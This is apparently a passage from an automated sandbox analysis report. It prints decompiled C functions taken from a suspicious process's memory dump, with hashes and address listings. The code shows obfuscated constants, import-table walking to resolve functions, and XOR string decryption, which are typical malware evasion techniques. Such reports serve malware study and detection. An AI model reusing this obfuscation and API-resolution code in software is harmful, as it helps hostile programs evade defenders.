                                                                                                                                                                                                                    				_v8 = 0xeadcff;
                                                                                                                                                                                                                    				_v8 = _v8 | 0x0d4a0dcb;
                                                                                                                                                                                                                    				_t60 = 0x79;
                                                                                                                                                                                                                    				_v8 = _v8 / _t60;
                                                                                                                                                                                                                    				_v8 = _v8 >> 3;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0x000b8ab9;
                                                                                                                                                                                                                    				_v28 = 0x60758f;
                                                                                                                                                                                                                    				_v28 = _v28 + 0x13fd;
                                                                                                                                                                                                                    				_v28 = _v28 ^ 0x00685ddc;
                                                                                                                                                                                                                    				_v24 = 0x238b20;
                                                                                                                                                                                                                    				_v24 = _v24 >> 0xd;
                                                                                                                                                                                                                    				_v24 = _v24 | 0x65e7a857;
                                                                                                                                                                                                                    				_v24 = _v24 ^ 0x65e86c1a;
                                                                                                                                                                                                                    				return E00A647F4(_v8, E00A6D266(_t60), _v28, _v24, _v20, _a4);
                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                    0x00a7c6df
                                                                                                                                                                                                                    0x00a7c6e8
                                                                                                                                                                                                                    0x00a7c6ec
                                                                                                                                                                                                                    0x00a7c6f3
                                                                                                                                                                                                                    0x00a7c6fa
                                                                                                                                                                                                                    0x00a7c701
                                                                                                                                                                                                                    0x00a7c704
                                                                                                                                                                                                                    0x00a7c70b
                                                                                                                                                                                                                    0x00a7c712
                                                                                                                                                                                                                    0x00a7c719
                                                                                                                                                                                                                    0x00a7c720
                                                                                                                                                                                                                    0x00a7c727
                                                                                                                                                                                                                    0x00a7c72e
                                                                                                                                                                                                                    0x00a7c735
                                                                                                                                                                                                                    0x00a7c741
                                                                                                                                                                                                                    0x00a7c744
                                                                                                                                                                                                                    0x00a7c747
                                                                                                                                                                                                                    0x00a7c74b
                                                                                                                                                                                                                    0x00a7c752
                                                                                                                                                                                                                    0x00a7c759
                                                                                                                                                                                                                    0x00a7c760
                                                                                                                                                                                                                    0x00a7c767
                                                                                                                                                                                                                    0x00a7c76e
                                                                                                                                                                                                                    0x00a7c772
                                                                                                                                                                                                                    0x00a7c779
                                                                                                                                                                                                                    0x00a7c7a7

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: I_
                                                                                                                                                                                                                    • API String ID: 0-1046359221
                                                                                                                                                                                                                    • Opcode ID: 22ea5ab853f81a2c34290b55dedc9ea51e0513eccd4e8ab15253473027dbcf47
                                                                                                                                                                                                                    • Instruction ID: 9d4d28eec544f939667d71e282cdcedbccb9e8ab86eb86c66a7533805d26bd3f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 22ea5ab853f81a2c34290b55dedc9ea51e0513eccd4e8ab15253473027dbcf47
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F21DB71D0120EABCB48DFE5CA8A4EEBFB1FB04308F208089D916B6260D7B54B55DF91
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                                                                                    			E00A6FDE3(void* __ecx, void* __edx) {
                                                                                                                                                                                                                    				void* _t89;
                                                                                                                                                                                                                    				void* _t102;
                                                                                                                                                                                                                    				signed short _t109;
                                                                                                                                                                                                                    				signed short _t110;
                                                                                                                                                                                                                    				signed short _t112;
                                                                                                                                                                                                                    				signed int _t114;
                                                                                                                                                                                                                    				signed int _t115;
                                                                                                                                                                                                                    				signed int _t116;
                                                                                                                                                                                                                    				signed int _t117;
                                                                                                                                                                                                                    				intOrPtr _t130;
                                                                                                                                                                                                                    				signed short _t132;
                                                                                                                                                                                                                    				signed short* _t135;
                                                                                                                                                                                                                    				signed short _t136;
                                                                                                                                                                                                                    				void* _t137;
                                                                                                                                                                                                                    				void* _t138;
                                                                                                                                                                                                                    				void* _t139;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_push( *((intOrPtr*)(_t138 + 0x3c)));
                                                                                                                                                                                                                    				_t137 = __ecx;
                                                                                                                                                                                                                    				_push(__edx);
                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                    				E00A7C6D8(_t89);
                                                                                                                                                                                                                    				 *(_t138 + 0x40) =  *(_t138 + 0x40) & 0x00000000;
                                                                                                                                                                                                                    				_t139 = _t138 + 0xc;
                                                                                                                                                                                                                    				 *(_t139 + 0x2c) = 0x7a10e0;
                                                                                                                                                                                                                    				 *((intOrPtr*)(_t139 + 0x30)) = 0xefb72f;
                                                                                                                                                                                                                    				 *(_t139 + 0x24) = 0xf5f0d5;
                                                                                                                                                                                                                    				 *(_t139 + 0x24) =  *(_t139 + 0x24) ^ 0xb3b9cefd;
                                                                                                                                                                                                                    				 *(_t139 + 0x24) =  *(_t139 + 0x24) ^ 0xb34c3e29;
                                                                                                                                                                                                                    				 *(_t139 + 0x1c) = 0x64ca25;
                                                                                                                                                                                                                    				_t114 = 0x2c;
                                                                                                                                                                                                                    				 *(_t139 + 0x1c) =  *(_t139 + 0x1c) / _t114;
                                                                                                                                                                                                                    				 *(_t139 + 0x1c) =  *(_t139 + 0x1c) | 0x36cadff0;
                                                                                                                                                                                                                    				 *(_t139 + 0x1c) =  *(_t139 + 0x1c) ^ 0x36ce153b;
                                                                                                                                                                                                                    				 *(_t139 + 0x14) = 0x1d66d1;
                                                                                                                                                                                                                    				_t115 = 0x7f;
                                                                                                                                                                                                                    				 *(_t139 + 0x14) =  *(_t139 + 0x14) / _t115;
                                                                                                                                                                                                                    				 *(_t139 + 0x14) =  *(_t139 + 0x14) + 0xffff1c82;
                                                                                                                                                                                                                    				 *(_t139 + 0x14) =  *(_t139 + 0x14) + 0xffffeb9d;
                                                                                                                                                                                                                    				 *(_t139 + 0x14) =  *(_t139 + 0x14) ^ 0xfffcfc72;
                                                                                                                                                                                                                    				 *(_t139 + 0x10) = 0x4fcda1;
                                                                                                                                                                                                                    				 *(_t139 + 0x10) =  *(_t139 + 0x10) << 7;
                                                                                                                                                                                                                    				 *(_t139 + 0x10) =  *(_t139 + 0x10) ^ 0x7c5fd077;
                                                                                                                                                                                                                    				_t116 = 0x3a;
                                                                                                                                                                                                                    				 *(_t139 + 0x10) =  *(_t139 + 0x10) * 0x11;
                                                                                                                                                                                                                    				 *(_t139 + 0x10) =  *(_t139 + 0x10) ^ 0x1748c2dd;
                                                                                                                                                                                                                    				 *(_t139 + 0x28) = 0xa15be;
                                                                                                                                                                                                                    				 *(_t139 + 0x28) =  *(_t139 + 0x28) | 0x827c3083;
                                                                                                                                                                                                                    				 *(_t139 + 0x28) =  *(_t139 + 0x28) ^ 0x827d9365;
                                                                                                                                                                                                                    				 *(_t139 + 0x18) = 0xf8bef;
                                                                                                                                                                                                                    				 *(_t139 + 0x18) =  *(_t139 + 0x18) / _t116;
                                                                                                                                                                                                                    				 *(_t139 + 0x18) =  *(_t139 + 0x18) * 0x15;
                                                                                                                                                                                                                    				 *(_t139 + 0x18) =  *(_t139 + 0x18) ^ 0x0008e82f;
                                                                                                                                                                                                                    				 *(_t139 + 0x20) = 0xc09ca0;
                                                                                                                                                                                                                    				 *(_t139 + 0x20) =  *(_t139 + 0x20) * 0x46;
                                                                                                                                                                                                                    				 *(_t139 + 0x20) =  *(_t139 + 0x20) + 0xffff1030;
                                                                                                                                                                                                                    				 *(_t139 + 0x20) =  *(_t139 + 0x20) ^ 0x34a68d52;
                                                                                                                                                                                                                    				_t117 =  *(_t139 + 0x24);
                                                                                                                                                                                                                    				_t102 =  *((intOrPtr*)(__ecx + 0x3c)) + __ecx;
                                                                                                                                                                                                                    				_t130 =  *((intOrPtr*)(_t102 + 0x78 + _t117 * 8));
                                                                                                                                                                                                                    				if(_t130 == 0 ||  *((intOrPtr*)(_t102 + 0x7c + _t117 * 8)) == 0) {
                                                                                                                                                                                                                    					L13:
                                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                    					_t136 = _t130 + __ecx;
                                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                                    						_t105 =  *((intOrPtr*)(_t136 + 0xc));
                                                                                                                                                                                                                    						if( *((intOrPtr*)(_t136 + 0xc)) == 0) {
                                                                                                                                                                                                                    							goto L13;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						_t132 = E00A78C20( *(_t139 + 0x20),  *(_t139 + 0x18), _t105 + _t137,  *(_t139 + 0x10));
                                                                                                                                                                                                                    						 *(_t139 + 0x2c) = _t132;
                                                                                                                                                                                                                    						__eflags = _t132;
                                                                                                                                                                                                                    						if(_t132 == 0) {
                                                                                                                                                                                                                    							L15:
                                                                                                                                                                                                                    							return 0;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						_t135 =  *_t136 + _t137;
                                                                                                                                                                                                                    						_t112 =  *((intOrPtr*)(_t136 + 0x10)) + _t137;
                                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                                    							_t109 =  *_t135;
                                                                                                                                                                                                                    							__eflags = _t109;
                                                                                                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							if(__eflags >= 0) {
                                                                                                                                                                                                                    								_t122 = _t137 + 2 + _t109;
                                                                                                                                                                                                                    								__eflags = _t137 + 2 + _t109;
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								_t122 = _t109 & 0x0000ffff;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							_t110 = E00A7D782(_t122,  *((intOrPtr*)(_t139 + 0x34)),  *(_t139 + 0x20),  *(_t139 + 0x24), _t132);
                                                                                                                                                                                                                    							_t139 = _t139 + 0xc;
                                                                                                                                                                                                                    							__eflags = _t110;
                                                                                                                                                                                                                    							if(_t110 == 0) {
                                                                                                                                                                                                                    								goto L15;
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								_t132 =  *(_t139 + 0x24);
                                                                                                                                                                                                                    								_t135 =  &(_t135[2]);
                                                                                                                                                                                                                    								 *_t112 = _t110;
                                                                                                                                                                                                                    								_t112 = _t112 + 4;
                                                                                                                                                                                                                    								__eflags = _t112;
                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						_t136 = _t136 + 0x14;
                                                                                                                                                                                                                    						__eflags = _t136;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					goto L13;
                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                    			}



















                                                                                                                                                                                                                    0x00a6fdea
                                                                                                                                                                                                                    0x00a6fdee
                                                                                                                                                                                                                    0x00a6fdf0
                                                                                                                                                                                                                    0x00a6fdf1
                                                                                                                                                                                                                    0x00a6fdf2
                                                                                                                                                                                                                    0x00a6fdf7
                                                                                                                                                                                                                    0x00a6fdfc
                                                                                                                                                                                                                    0x00a6fdff
                                                                                                                                                                                                                    0x00a6fe09
                                                                                                                                                                                                                    0x00a6fe11
                                                                                                                                                                                                                    0x00a6fe19
                                                                                                                                                                                                                    0x00a6fe21
                                                                                                                                                                                                                    0x00a6fe29
                                                                                                                                                                                                                    0x00a6fe37
                                                                                                                                                                                                                    0x00a6fe3c
                                                                                                                                                                                                                    0x00a6fe40
                                                                                                                                                                                                                    0x00a6fe48
                                                                                                                                                                                                                    0x00a6fe50
                                                                                                                                                                                                                    0x00a6fe5e
                                                                                                                                                                                                                    0x00a6fe63
                                                                                                                                                                                                                    0x00a6fe67
                                                                                                                                                                                                                    0x00a6fe6f
                                                                                                                                                                                                                    0x00a6fe77
                                                                                                                                                                                                                    0x00a6fe7f
                                                                                                                                                                                                                    0x00a6fe87
                                                                                                                                                                                                                    0x00a6fe8c
                                                                                                                                                                                                                    0x00a6fe9b
                                                                                                                                                                                                                    0x00a6fe9c
                                                                                                                                                                                                                    0x00a6fea0
                                                                                                                                                                                                                    0x00a6fea8
                                                                                                                                                                                                                    0x00a6feb0
                                                                                                                                                                                                                    0x00a6feb8
                                                                                                                                                                                                                    0x00a6fec0
                                                                                                                                                                                                                    0x00a6fece
                                                                                                                                                                                                                    0x00a6fed7
                                                                                                                                                                                                                    0x00a6fee3
                                                                                                                                                                                                                    0x00a6feeb
                                                                                                                                                                                                                    0x00a6fef8
                                                                                                                                                                                                                    0x00a6fefc
                                                                                                                                                                                                                    0x00a6ff04
                                                                                                                                                                                                                    0x00a6ff0f
                                                                                                                                                                                                                    0x00a6ff13
                                                                                                                                                                                                                    0x00a6ff15
                                                                                                                                                                                                                    0x00a6ff1b
                                                                                                                                                                                                                    0x00a6ff95
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6ff24
                                                                                                                                                                                                                    0x00a6ff24
                                                                                                                                                                                                                    0x00a6ff8e
                                                                                                                                                                                                                    0x00a6ff8e
                                                                                                                                                                                                                    0x00a6ff93
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6ff3d
                                                                                                                                                                                                                    0x00a6ff3f
                                                                                                                                                                                                                    0x00a6ff45
                                                                                                                                                                                                                    0x00a6ff47
                                                                                                                                                                                                                    0x00a6ffa0
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6ffa0
                                                                                                                                                                                                                    0x00a6ff4e
                                                                                                                                                                                                                    0x00a6ff50
                                                                                                                                                                                                                    0x00a6ff85
                                                                                                                                                                                                                    0x00a6ff85
                                                                                                                                                                                                                    0x00a6ff87
                                                                                                                                                                                                                    0x00a6ff89
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6ff54
                                                                                                                                                                                                                    0x00a6ff5e
                                                                                                                                                                                                                    0x00a6ff5e
                                                                                                                                                                                                                    0x00a6ff56
                                                                                                                                                                                                                    0x00a6ff56
                                                                                                                                                                                                                    0x00a6ff56
                                                                                                                                                                                                                    0x00a6ff6d
                                                                                                                                                                                                                    0x00a6ff72
                                                                                                                                                                                                                    0x00a6ff75
                                                                                                                                                                                                                    0x00a6ff77
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6ff79
                                                                                                                                                                                                                    0x00a6ff79
                                                                                                                                                                                                                    0x00a6ff7d
                                                                                                                                                                                                                    0x00a6ff80
                                                                                                                                                                                                                    0x00a6ff82
                                                                                                                                                                                                                    0x00a6ff82
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6ff82
                                                                                                                                                                                                                    0x00a6ff77
                                                                                                                                                                                                                    0x00a6ff8b
                                                                                                                                                                                                                    0x00a6ff8b
                                                                                                                                                                                                                    0x00a6ff8b
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6ff8e

                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: d91e49e7f7b161bbec663a9792361c0933e1fe0c511be7b98afa36f1725c3930
                                                                                                                                                                                                                    • Instruction ID: 985fe8095c8474104b7246f009cd6cd631e482f2666216af5cdf4d52c4d66050
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d91e49e7f7b161bbec663a9792361c0933e1fe0c511be7b98afa36f1725c3930
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 935176716083028FC308CF29E98551BBBF1FFD8358F148A2DF48A96261D774DA09CB96
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                                                                                                    			E00A81E60(signed int* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                                    				void* _t45;
                                                                                                                                                                                                                    				signed int _t50;
                                                                                                                                                                                                                    				short* _t67;
                                                                                                                                                                                                                    				signed int _t68;
                                                                                                                                                                                                                    				signed int _t74;
                                                                                                                                                                                                                    				unsigned int _t75;
                                                                                                                                                                                                                    				unsigned int _t76;
                                                                                                                                                                                                                    				signed int _t81;
                                                                                                                                                                                                                    				short* _t82;
                                                                                                                                                                                                                    				signed int* _t83;
                                                                                                                                                                                                                    				signed int* _t84;
                                                                                                                                                                                                                    				signed int _t85;
                                                                                                                                                                                                                    				unsigned int _t87;
                                                                                                                                                                                                                    				void* _t93;
                                                                                                                                                                                                                    				short _t94;
                                                                                                                                                                                                                    				void* _t95;
                                                                                                                                                                                                                    				void* _t96;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_push( *((intOrPtr*)(_t95 + 0x38)));
                                                                                                                                                                                                                    				_push( *((intOrPtr*)(_t95 + 0x38)));
                                                                                                                                                                                                                    				_push( *((intOrPtr*)(_t95 + 0x38)));
                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                    				E00A7C6D8(_t45);
                                                                                                                                                                                                                    				 *((intOrPtr*)(_t95 + 0x34)) = 0xcb808;
                                                                                                                                                                                                                    				_t83 =  &(__ecx[1]);
                                                                                                                                                                                                                    				_t94 = 0;
                                                                                                                                                                                                                    				 *((intOrPtr*)(_t95 + 0x38)) = 0;
                                                                                                                                                                                                                    				 *((intOrPtr*)(_t95 + 0x3c)) = 0;
                                                                                                                                                                                                                    				 *(_t95 + 0x28) = 0xdac611;
                                                                                                                                                                                                                    				 *(_t95 + 0x28) =  *(_t95 + 0x28) + 0xa45c;
                                                                                                                                                                                                                    				 *(_t95 + 0x28) =  *(_t95 + 0x28) + 0xffff154f;
                                                                                                                                                                                                                    				 *(_t95 + 0x28) =  *(_t95 + 0x28) ^ 0x00d05fa6;
                                                                                                                                                                                                                    				 *(_t95 + 0x24) = 0xc32094;
                                                                                                                                                                                                                    				 *(_t95 + 0x24) =  *(_t95 + 0x24) << 1;
                                                                                                                                                                                                                    				_t85 = 0x42;
                                                                                                                                                                                                                    				 *(_t95 + 0x24) =  *(_t95 + 0x24) / _t85;
                                                                                                                                                                                                                    				 *(_t95 + 0x24) =  *(_t95 + 0x24) ^ 0x000bd726;
                                                                                                                                                                                                                    				_t81 =  *__ecx;
                                                                                                                                                                                                                    				_t84 =  &(_t83[1]);
                                                                                                                                                                                                                    				_t50 =  *_t83 ^ _t81;
                                                                                                                                                                                                                    				 *(_t95 + 0x2c) = _t81;
                                                                                                                                                                                                                    				 *(_t95 + 0x30) = _t50;
                                                                                                                                                                                                                    				_t28 = _t50 + 1; // 0x2
                                                                                                                                                                                                                    				_t87 =  !=  ? (_t28 & 0xfffffffc) + 4 : _t28;
                                                                                                                                                                                                                    				_t67 = E00A7C6D9(_t87 + _t87);
                                                                                                                                                                                                                    				_t96 = _t95 + 0x18;
                                                                                                                                                                                                                    				 *((intOrPtr*)(_t96 + 0x14)) = _t67;
                                                                                                                                                                                                                    				if(_t67 != 0) {
                                                                                                                                                                                                                    					_t82 = _t67;
                                                                                                                                                                                                                    					_t93 =  >  ? 0 :  &(_t84[_t87 >> 2]) - _t84 + 3 >> 2;
                                                                                                                                                                                                                    					if(_t93 != 0) {
                                                                                                                                                                                                                    						_t68 =  *(_t96 + 0x18);
                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                    							_t74 =  *_t84;
                                                                                                                                                                                                                    							_t84 =  &(_t84[1]);
                                                                                                                                                                                                                    							_t75 = _t74 ^ _t68;
                                                                                                                                                                                                                    							 *_t82 = _t75 & 0x000000ff;
                                                                                                                                                                                                                    							_t82 = _t82 + 8;
                                                                                                                                                                                                                    							 *((short*)(_t82 - 6)) = _t75 >> 0x00000008 & 0x000000ff;
                                                                                                                                                                                                                    							_t76 = _t75 >> 0x10;
                                                                                                                                                                                                                    							_t94 = _t94 + 1;
                                                                                                                                                                                                                    							 *((short*)(_t82 - 4)) = _t76 & 0x000000ff;
                                                                                                                                                                                                                    							 *((short*)(_t82 - 2)) = _t76 >> 0x00000008 & 0x000000ff;
                                                                                                                                                                                                                    						} while (_t94 < _t93);
                                                                                                                                                                                                                    						_t67 =  *((intOrPtr*)(_t96 + 0x14));
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					 *((short*)(_t67 +  *(_t96 + 0x1c) * 2)) = 0;
                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                    				return _t67;
                                                                                                                                                                                                                    			}




















                                                                                                                                                                                                                    0x00a81e67
                                                                                                                                                                                                                    0x00a81e6b
                                                                                                                                                                                                                    0x00a81e6f
                                                                                                                                                                                                                    0x00a81e74
                                                                                                                                                                                                                    0x00a81e75
                                                                                                                                                                                                                    0x00a81e7a
                                                                                                                                                                                                                    0x00a81e82
                                                                                                                                                                                                                    0x00a81e85
                                                                                                                                                                                                                    0x00a81e89
                                                                                                                                                                                                                    0x00a81e8d
                                                                                                                                                                                                                    0x00a81e91
                                                                                                                                                                                                                    0x00a81e99
                                                                                                                                                                                                                    0x00a81ea1
                                                                                                                                                                                                                    0x00a81ea9
                                                                                                                                                                                                                    0x00a81eb1
                                                                                                                                                                                                                    0x00a81eb9
                                                                                                                                                                                                                    0x00a81ec3
                                                                                                                                                                                                                    0x00a81ec6
                                                                                                                                                                                                                    0x00a81eca
                                                                                                                                                                                                                    0x00a81ed2
                                                                                                                                                                                                                    0x00a81ed6
                                                                                                                                                                                                                    0x00a81ed9
                                                                                                                                                                                                                    0x00a81edb
                                                                                                                                                                                                                    0x00a81edf
                                                                                                                                                                                                                    0x00a81ee3
                                                                                                                                                                                                                    0x00a81ef3
                                                                                                                                                                                                                    0x00a81f07
                                                                                                                                                                                                                    0x00a81f09
                                                                                                                                                                                                                    0x00a81f0c
                                                                                                                                                                                                                    0x00a81f12
                                                                                                                                                                                                                    0x00a81f19
                                                                                                                                                                                                                    0x00a81f2a
                                                                                                                                                                                                                    0x00a81f2f
                                                                                                                                                                                                                    0x00a81f31
                                                                                                                                                                                                                    0x00a81f35
                                                                                                                                                                                                                    0x00a81f35
                                                                                                                                                                                                                    0x00a81f37
                                                                                                                                                                                                                    0x00a81f3a
                                                                                                                                                                                                                    0x00a81f3f
                                                                                                                                                                                                                    0x00a81f47
                                                                                                                                                                                                                    0x00a81f4d
                                                                                                                                                                                                                    0x00a81f51
                                                                                                                                                                                                                    0x00a81f5a
                                                                                                                                                                                                                    0x00a81f5b
                                                                                                                                                                                                                    0x00a81f62
                                                                                                                                                                                                                    0x00a81f66
                                                                                                                                                                                                                    0x00a81f6a
                                                                                                                                                                                                                    0x00a81f6a
                                                                                                                                                                                                                    0x00a81f74
                                                                                                                                                                                                                    0x00a81f74
                                                                                                                                                                                                                    0x00a81f81

                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 591abd325acd47885606264eb836e932c211e837b7b2849f80b6ed1ab6b163e9
                                                                                                                                                                                                                    • Instruction ID: c490a6f4ef88ee66c08f80e7138877f40e6066677ebe864df96c3d23153c3482
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 591abd325acd47885606264eb836e932c211e837b7b2849f80b6ed1ab6b163e9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 35310272A083119BC700DF29C88445BFBE0EFC8714F854A2EF889A7260E730D909CB92
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                                                                    			E00A7E9BB(void* __eflags) {
                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                                                    				char _v40;
                                                                                                                                                                                                                    				short _v44;
                                                                                                                                                                                                                    				intOrPtr _v48;
                                                                                                                                                                                                                    				intOrPtr _v52;
                                                                                                                                                                                                                    				intOrPtr _v56;
                                                                                                                                                                                                                    				char _v576;
                                                                                                                                                                                                                    				intOrPtr* _t87;
                                                                                                                                                                                                                    				signed int _t91;
                                                                                                                                                                                                                    				signed int _t92;
                                                                                                                                                                                                                    				signed int _t93;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_v56 = 0x359bf2;
                                                                                                                                                                                                                    				_v52 = 0xe81df8;
                                                                                                                                                                                                                    				_v48 = 0xf01c5f;
                                                                                                                                                                                                                    				_v40 = 0;
                                                                                                                                                                                                                    				_v44 = 0;
                                                                                                                                                                                                                    				_v20 = 0x9bf32;
                                                                                                                                                                                                                    				_v20 = _v20 << 0x10;
                                                                                                                                                                                                                    				_v20 = _v20 ^ 0xbf365a45;
                                                                                                                                                                                                                    				_v28 = 0x2c7bcd;
                                                                                                                                                                                                                    				_t91 = 0x15;
                                                                                                                                                                                                                    				_v28 = _v28 * 0xe;
                                                                                                                                                                                                                    				_v28 = _v28 ^ 0x0268c8a3;
                                                                                                                                                                                                                    				_v36 = 0x394e06;
                                                                                                                                                                                                                    				_v36 = _v36 * 0x12;
                                                                                                                                                                                                                    				_v36 = _v36 ^ 0x0408d20c;
                                                                                                                                                                                                                    				_v8 = 0x2dbdef;
                                                                                                                                                                                                                    				_v8 = _v8 + 0x868e;
                                                                                                                                                                                                                    				_v8 = _v8 | 0x35233a1e;
                                                                                                                                                                                                                    				_v8 = _v8 + 0x1d2f;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0x3523f42c;
                                                                                                                                                                                                                    				_v16 = 0xbc295a;
                                                                                                                                                                                                                    				_v16 = _v16 >> 8;
                                                                                                                                                                                                                    				_v16 = _v16 + 0xfffff2c8;
                                                                                                                                                                                                                    				_v16 = _v16 ^ 0x000286d6;
                                                                                                                                                                                                                    				_v24 = 0x4079c;
                                                                                                                                                                                                                    				_t92 = 0x7a;
                                                                                                                                                                                                                    				_v24 = _v24 / _t91;
                                                                                                                                                                                                                    				_v24 = _v24 ^ 0x000f645d;
                                                                                                                                                                                                                    				_v12 = 0x59acfc;
                                                                                                                                                                                                                    				_push(_t92);
                                                                                                                                                                                                                    				_v12 = _v12 / _t92;
                                                                                                                                                                                                                    				_v12 = _v12 >> 6;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0x000626c8;
                                                                                                                                                                                                                    				_v32 = 0x1d6f3e;
                                                                                                                                                                                                                    				_v32 = _v32 * 0x17;
                                                                                                                                                                                                                    				_v32 = _v32 ^ 0x02a08dbd;
                                                                                                                                                                                                                    				_t93 = _v20;
                                                                                                                                                                                                                    				if(E00A62B9E(_t93, _v28, _v36,  &_v576) != 0) {
                                                                                                                                                                                                                    					_t87 =  &_v576;
                                                                                                                                                                                                                    					if(_v576 != 0) {
                                                                                                                                                                                                                    						while( *_t87 != 0x5c) {
                                                                                                                                                                                                                    							_t87 = _t87 + 2;
                                                                                                                                                                                                                    							if( *_t87 != 0) {
                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							goto L6;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						_t93 = 0;
                                                                                                                                                                                                                    						 *((short*)(_t87 + 2)) = 0;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					L6:
                                                                                                                                                                                                                    					_push(_t93);
                                                                                                                                                                                                                    					_push(_t93);
                                                                                                                                                                                                                    					E00A80D38(_v8, _v16, _v24, _t93, _v12,  &_v40, _t93, _t93,  &_v576, _t93, _v32);
                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                    				return _v40;
                                                                                                                                                                                                                    			}





















                                                                                                                                                                                                                    0x00a7e9c4
                                                                                                                                                                                                                    0x00a7e9cd
                                                                                                                                                                                                                    0x00a7e9d4
                                                                                                                                                                                                                    0x00a7e9de
                                                                                                                                                                                                                    0x00a7e9e1
                                                                                                                                                                                                                    0x00a7e9e4
                                                                                                                                                                                                                    0x00a7e9eb
                                                                                                                                                                                                                    0x00a7e9ef
                                                                                                                                                                                                                    0x00a7e9f6
                                                                                                                                                                                                                    0x00a7ea03
                                                                                                                                                                                                                    0x00a7ea06
                                                                                                                                                                                                                    0x00a7ea09
                                                                                                                                                                                                                    0x00a7ea10
                                                                                                                                                                                                                    0x00a7ea1b
                                                                                                                                                                                                                    0x00a7ea1e
                                                                                                                                                                                                                    0x00a7ea25
                                                                                                                                                                                                                    0x00a7ea2c
                                                                                                                                                                                                                    0x00a7ea33
                                                                                                                                                                                                                    0x00a7ea3a
                                                                                                                                                                                                                    0x00a7ea41
                                                                                                                                                                                                                    0x00a7ea48
                                                                                                                                                                                                                    0x00a7ea4f
                                                                                                                                                                                                                    0x00a7ea53
                                                                                                                                                                                                                    0x00a7ea5a
                                                                                                                                                                                                                    0x00a7ea61
                                                                                                                                                                                                                    0x00a7ea6d
                                                                                                                                                                                                                    0x00a7ea6e
                                                                                                                                                                                                                    0x00a7ea73
                                                                                                                                                                                                                    0x00a7ea7a
                                                                                                                                                                                                                    0x00a7ea86
                                                                                                                                                                                                                    0x00a7ea87
